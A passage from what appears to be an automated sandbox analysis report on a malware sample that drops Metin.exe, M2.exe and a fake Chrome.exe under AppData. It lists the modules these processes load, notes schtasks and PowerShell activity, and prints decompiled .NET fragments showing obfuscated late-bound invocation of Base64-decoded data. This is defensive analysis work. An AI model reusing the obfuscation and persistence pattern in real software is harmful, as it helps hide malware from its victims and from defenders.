                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
                        Source: Chrome.lnk.9.drLNK file: ..\..\..\..\..\Chrome.exe
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Binary string: xHPloHC:\Windows\System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2529308838.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb|kt source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdbC source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2569540442.0000000005E5B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbe source: M2.exe, 00000006.00000002.2530123513.00000000007E6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @xo.pdbService source: M2.exe, 00000006.00000002.2529308838.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb3v source: M2.exe, 00000006.00000002.2530123513.00000000007E6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2530123513.0000000000760000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb| source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.P2mf0VG3Z23btQPXTeWoUc4EnGWDH0AGfRKMOWI7J68yK4pVMLXPcLhXhC1hvImrGy0Aey4H2ZuiulBcjOpQ,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.uVzSMwhr8uVTudA4B6vvjwlelEqBmYLIYhH2FdSzaOrmofSlnrIHz0lRml90KCcWtXLQuC7t5pv5yHiCL8Hz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.O1fUh2FqK9YKCXNjVlTAAUZqudBCNKzcmUJuKR8FE4aS3eLyvMiTd2jQ4fdorMK2j9Xac95SEFhJw47CHfCz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.ljCPR1FH8j5yhPI3U9x904OUGdp6iZBBNsKDyUw5nryMnhOyjPQGVMgHek2YxCtwVQKj60buvcDDomD1uqJO,_7DAslXk4aRGtCt1oeUw5TeOhtE._4143yORnHD1dsEVvA8EAP2Yg0h()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QBTQa3EkUuQM9en7BwZr2kZOc9[2],_7DAslXk4aRGtCt1oeUw5TeOhtE._1yCi8e7NkC4yKRwRiC8QMqlmos(Convert.FromBase64String(QBTQa3EkUuQM9en7BwZr2kZOc9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QBTQa3EkUuQM9en7BwZr2kZOc9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.P2mf0VG3Z23btQPXTeWoUc4EnGWDH0AGfRKMOWI7J68yK4pVMLXPcLhXhC1hvImrGy0Aey4H2ZuiulBcjOpQ,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.uVzSMwhr8uVTudA4B6vvjwlelEqBmYLIYhH2FdSzaOrmofSlnrIHz0lRml90KCcWtXLQuC7t5pv5yHiCL8Hz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.O1fUh2FqK9YKCXNjVlTAAUZqudBCNKzcmUJuKR8FE4aS3eLyvMiTd2jQ4fdorMK2j9Xac95SEFhJw47CHfCz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.ljCPR1FH8j5yhPI3U9x904OUGdp6iZBBNsKDyUw5nryMnhOyjPQGVMgHek2YxCtwVQKj60buvcDDomD1uqJO,_7DAslXk4aRGtCt1oeUw5TeOhtE._4143yORnHD1dsEVvA8EAP2Yg0h()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QBTQa3EkUuQM9en7BwZr2kZOc9[2],_7DAslXk4aRGtCt1oeUw5TeOhtE._1yCi8e7NkC4yKRwRiC8QMqlmos(Convert.FromBase64String(QBTQa3EkUuQM9en7BwZr2kZOc9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QBTQa3EkUuQM9en7BwZr2kZOc9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
